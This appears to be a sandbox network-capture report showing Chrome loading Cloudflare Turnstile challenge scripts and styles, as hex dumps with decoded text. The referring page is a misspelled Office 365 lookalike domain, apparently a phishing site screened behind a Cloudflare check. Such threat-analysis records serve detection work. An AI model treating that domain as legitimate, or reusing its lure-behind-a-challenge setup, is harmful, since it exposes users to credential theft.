                                                                                        Data Ascii: eflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Oe(e,t,a){return Be()?Oe=Reflect.construct:Oe=function(c,l,v){var h=[null];h.push.apply(h,l);var s=Function.bind.apply(c,h),p=new s;return v&&ee(p,v.prototype),p},Oe.apply(null,argu
                                                                                        2025-03-24 04:00:05 UTC1369INData Raw: 3b 66 75 6e 63 74 69 6f 6e 20 67 28 65 2c 74 29 7b 76 61 72 20 61 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 66 72 28 61 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 78 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 58 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 71 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 71 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 24 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 71 65 29 2e 63 6f 6e 63 61 74 28 65 29
                                                                                        Data Ascii: ;function g(e,t){var a="[Cloudflare Turnstile] ".concat(e,".");throw new fr(a,t)}function x(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function Xe(e){return e.startsWith(qe)?e.substring(qe.length):null}function $(e){return"".concat(qe).concat(e)
                                                                                        2025-03-24 04:00:05 UTC1369INData Raw: 67 68 74 3d 22 31 30 30 76 68 22 2c 73 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 73 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 73 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 73 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 73 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 73 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c
                                                                                        Data Ascii: ght="100vh",s.style.top="0",s.style.left="0",s.style.transformOrigin="center center",s.style.overflowX="hidden",s.style.overflowY="auto",s.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.vertical


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.1649716104.18.95.414436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:05 UTC858OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/cqb6i/0x4AAAAAAA-tr_eUy_ttfipm/auto/fbE/new/normal/auto/ HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-Dest: iframe
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://offce365.auramisteriosafyr.it.com/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:05 UTC1297INHTTP/1.1 200 OK
                                                                                        Date: Mon, 24 Mar 2025 04:00:05 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 28423
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                        content-security-policy: default-src 'none'; script-src 'nonce-jtfBTvo1pVWnfIhW' 'unsafe-eval'; script-src-attr 'none'; worker-src blob:; style-src 'unsafe-inline'; img-src 'self'; connect-src 'self'; frame-src 'self' blob:; child-src 'self' blob:; form-action 'none'; base-uri 'self'; sandbox allow-same-origin allow-scripts allow-popups allow-forms
                                                                                        cross-origin-embedder-policy: require-corp
                                                                                        cross-origin-opener-policy: same-origin
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        origin-agent-cluster: ?1
                                                                                        accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                        2025-03-24 04:00:05 UTC411INData Raw: 63 72 69 74 69 63 61 6c 2d 63 68 3a 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 62 69 6c 65 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2c 20 55 41 2d 42 69 74 6e 65 73 73 2c 20 55 41 2d 41 72 63 68 2c 20 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 55 41 2d 4d 6f 62 69 6c 65 2c 20 55 41 2d 4d 6f 64 65 6c 2c 20 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 2c 20 55 41 2d 50
                                                                                        Data Ascii: critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-P
                                                                                        2025-03-24 04:00:05 UTC1030INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 26 23 78 32 37 3b 6e 6f 6e 65 26 23 78 32 37 3b 3b 20 73 63 72 69 70 74 2d 73 72 63 20 26 23 78 32 37 3b 6e 6f 6e 63 65 2d 6a 74 66 42 54 76 6f 31 70 56 57 6e 66 49 68 57 26 23 78 32 37 3b 20 26 23 78 32 37 3b 75 6e 73 61 66 65 2d
                                                                                        Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="x-ua-compatible" content="IE=Edge,chrome=1"> <meta http-equiv="content-security-policy" content="default-src &#x27;none&#x27;; script-src &#x27;nonce-jtfBTvo1pVWnfIhW&#x27; &#x27;unsafe-
                                                                                        2025-03-24 04:00:05 UTC1369INData Raw: 6d 65 73 20 66 69 6c 6c 66 61 69 6c 7b 74 6f 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 33 30 70 78 20 30 20 30 20 23 64 65 31 33 30 33 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 69 6c 6c 66 61 69 6c 2d 6f 66 66 6c 61 62 65 6c 7b 74 6f 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 33 30 70 78 20 23 32 33 32 33 32 33 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 69 6c 6c 66 61 69 6c 2d 6f 66 66 6c 61 62 65 6c 2d 64 61 72 6b 7b 74 6f 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 33 30 70 78 20 23 66 66 66 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 30 31 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72
                                                                                        Data Ascii: mes fillfail{to{box-shadow:inset 0 30px 0 0 #de1303}}@keyframes fillfail-offlabel{to{box-shadow:inset 0 0 0 30px #232323}}@keyframes fillfail-offlabel-dark{to{box-shadow:inset 0 0 0 30px #fff}}@keyframes scale-up-center{0%{transform:scale(.01)}to{transfor
                                                                                        2025-03-24 04:00:05 UTC1369INData Raw: 61 6c 69 67 6e 3a 72 69 67 68 74 7d 23 6f 76 65 72 72 75 6e 2d 69 2c 23 73 70 69 6e 6e 65 72 2d 69 7b 61 6e 69 6d 61 74 69 6f 6e 3a 73 70 69 6e 20 35 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 66 61 69 6c 2d 69 7b 61 6e 69 6d 61 74 69 6f 6e 3a 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 35 35 2c 2e 30 38 35 2c 2e 36 38 2c 2e 35 33 29 20 62 6f 74 68 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 23 64 65 31 33 30 33 7d 23 66 61 69 6c 2d 69 2c 23 73 75 63 63 65 73 73 2d 69 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 64 69 73 70 6c 61 79 3a 66
                                                                                        Data Ascii: align:right}#overrun-i,#spinner-i{animation:spin 5s linear infinite;display:flex;height:30px;width:30px}#fail-i{animation:scale-up-center .6s cubic-bezier(.55,.085,.68,.53) both;box-shadow:inset 0 0 0 #de1303}#fail-i,#success-i{border-radius:50%;display:f
                                                                                        2025-03-24 04:00:05 UTC1369INData Raw: 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 61 61 39 33 37 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 3a 23 30 61 61 39 33 37 3b 66 69 6c 6c 3a 23 30 61 61 39 33 37 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 78 70 69 72 65 64 2d 63 69 72 63 6c 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 74 69 6d 65 6f 75 74 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 39 39 39 3b 66 69 6c 6c 3a 23 39 39 39 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 65 78 70
                                                                                        Data Ascii: hadow:inset 0 0 0 #0aa937}.theme-dark .success-circle{stroke:#0aa937;fill:#0aa937}.theme-dark .expired-circle,.theme-dark .timeout-circle{stroke-dasharray:166;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#999;fill:#999}.theme-dark #exp
                                                                                        2025-03-24 04:00:05 UTC1369INData Raw: 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 68 31 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 7b 63 6f 6c 6f 72 3a 23 66 66 61 32 39 39 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c
                                                                                        Data Ascii: }.theme-dark h1{color:#fff}.theme-dark #challenge-error-title{color:#ffa299}.theme-dark #challenge-error-title a,.theme-dark #challenge-error-title a:link,.theme-dark #challenge-error-title a:visited{color:#bbb}.theme-dark #challenge-error-title a:active,
                                                                                        2025-03-24 04:00:05 UTC1369INData Raw: 65 73 68 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 74 69 6d 65 6f 75 74 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 74 69 6d 65 6f 75 74 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6f 76 65 72 6c 61 79 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 66 66 61 32 39 39 3b 63 6f 6c 6f 72 3a 23 66 66 61 32 39 39 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 3a 6c 69 6e 6b
                                                                                        Data Ascii: esh-link:active,.theme-dark #timeout-refresh-link:focus,.theme-dark #timeout-refresh-link:hover{color:#949494}.theme-dark .overlay{border-color:#ffa299;color:#ffa299}.theme-dark .error-message,.theme-dark .error-message a,.theme-dark .error-message a:link
                                                                                        2025-03-24 04:00:05 UTC1369INData Raw: 3a 63 68 65 63 6b 65 64 7e 2e 63 62 2d 69 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 6f 70 61 63 69 74 79 3a 31 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 20 73 63 61 6c 65 28 31 29 7d 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 7e 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 3a 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 20 34 70 78 20 34 70 78 20 30 3b 68 65 69 67 68 74 3a 31 32 70 78 3b 6c 65 66 74 3a 35 70 78 3b 74 6f 70 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 34 35 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 77 69 64
                                                                                        Data Ascii: :checked~.cb-i{background-color:#fff;border-radius:5px;opacity:1;transform:rotate(0deg) scale(1)}.cb-lb input:checked~.cb-i:after{border:solid #c44d0e;border-radius:0;border-width:0 4px 4px 0;height:12px;left:5px;top:0;transform:rotate(45deg) scale(1);wid
                                                                                        2025-03-24 04:00:05 UTC1369INData Raw: 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 20 73 70 61 63 65 2d 65 76 65 6e 6c 79 3b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 65 78 70 69 72 65 64 2d 74 65 78 74 2c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6f 76 65 72 72 75 6e 2d 74 65 78 74 2c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 69 6d 65 6f 75 74 2d 74 65 78 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 65 78 70 69 72 65 64 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 2c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 69 6d 65 6f 75 74 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 2c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 7b 6d 61 72 67 69 6e 3a 30
                                                                                        Data Ascii: ontent:center space-evenly;visibility:visible}.size-compact #expired-text,.size-compact #overrun-text,.size-compact #timeout-text{display:block}.size-compact #expired-refresh-link,.size-compact #timeout-refresh-link,.size-compact .error-message a{margin:0
                                                                                        2025-03-24 04:00:05 UTC1369INData Raw: 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 36 70 78 7d 23 74 65 72 6d 73 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 70 78 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 30 70 78 7d 23 74 65 72 6d 73 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 30 20 2e 32 72 65 6d 7d 23 74 65 72 6d 73 20 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 23 74 65 72 6d 73 20 61 2c 23 74 65 72 6d 73 20 61 3a 6c 69 6e 6b 2c 23 74 65 72 6d 73 20 61 3a 76 69 73 69 74 65 64 7b 63 6f
                                                                                        Data Ascii: {margin-left:0;margin-right:16px}#terms{color:#232323;display:inline-flex;font-size:8px;font-style:normal;justify-content:flex-end;line-height:10px}#terms .link-spacer{margin:0 .2rem}#terms a{display:inline-block}#terms a,#terms a:link,#terms a:visited{co


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.1649717104.18.95.414436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:06 UTC772OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92534274b8aa19bf&lang=auto HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/cqb6i/0x4AAAAAAA-tr_eUy_ttfipm/auto/fbE/new/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:06 UTC331INHTTP/1.1 200 OK
                                                                                        Date: Mon, 24 Mar 2025 04:00:06 GMT
                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                        Content-Length: 120195
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 92534277b9fc0f65-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-24 04:00:06 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 43 75 55 53 37 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72
                                                                                        Data Ascii: window._cf_chl_opt.CuUS7={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflar
                                                                                        2025-03-24 04:00:06 UTC1369INData Raw: 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22
                                                                                        Data Ascii: 22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","testing_only"
                                                                                        2025-03-24 04:00:06 UTC1369INData Raw: 25 32 30 68 65 72 65 25 33 46 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22 3a 22 45 78 70 69 72 65 64 22 7d 2c 22 70 6f 6c 79 66 69 6c 6c 73 22 3a 7b 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 66 61 6c 73 65 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 67 75 69 64 65 6c 69 6e 65 22 3a 66 61 6c 73 65 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 61 75 78 5f 73 75 62 74 69 74 6c 65 22 3a 66 61 6c 73 65 7d 2c 22 72 74 6c 22 3a 66 61 6c 73 65 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 75 73 22 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 67 4a 2c 65 4d 2c 65 4e 2c 65 4f 2c 65 59 2c 66 32 2c 66 35 2c 66 38 2c 66 61 2c 66 62 2c 66 63 2c 66 6f 2c 66 41 2c 66 47 2c 66 48 2c 66 49 2c 66
                                                                                        Data Ascii: %20here%3F","turnstile_expired":"Expired"},"polyfills":{"feedback_report_output_subtitle":false,"feedback_report_guideline":false,"feedback_report_aux_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eO,eY,f2,f5,f8,fa,fb,fc,fo,fA,fG,fH,fI,f
                                                                                        2025-03-24 04:00:06 UTC1369INData Raw: 37 29 5d 28 73 65 74 54 69 6d 65 6f 75 74 2c 66 31 2c 30 29 7d 29 3a 73 65 74 54 69 6d 65 6f 75 74 28 66 31 2c 30 29 2c 66 32 3d 66 75 6e 63 74 69 6f 6e 28 68 74 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 68 74 3d 67 4a 2c 64 3d 7b 27 65 5a 54 45 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 6e 72 52 75 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 4f 70 65 71 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 27 5a 49 68 71 50 27 3a 68 74 28 31 30 31 38 29 2c 27 72 6f 76 59 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 77 68 42 50 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c
                                                                                        Data Ascii: 7)](setTimeout,f1,0)}):setTimeout(f1,0),f2=function(ht,d,e,f,g){return ht=gJ,d={'eZTEl':function(h,i){return h==i},'nrRuV':function(h,i){return h<i},'OpeqV':function(h,i){return h===i},'ZIhqP':ht(1018),'rovYm':function(h,i){return h-i},'whBPL':function(h,
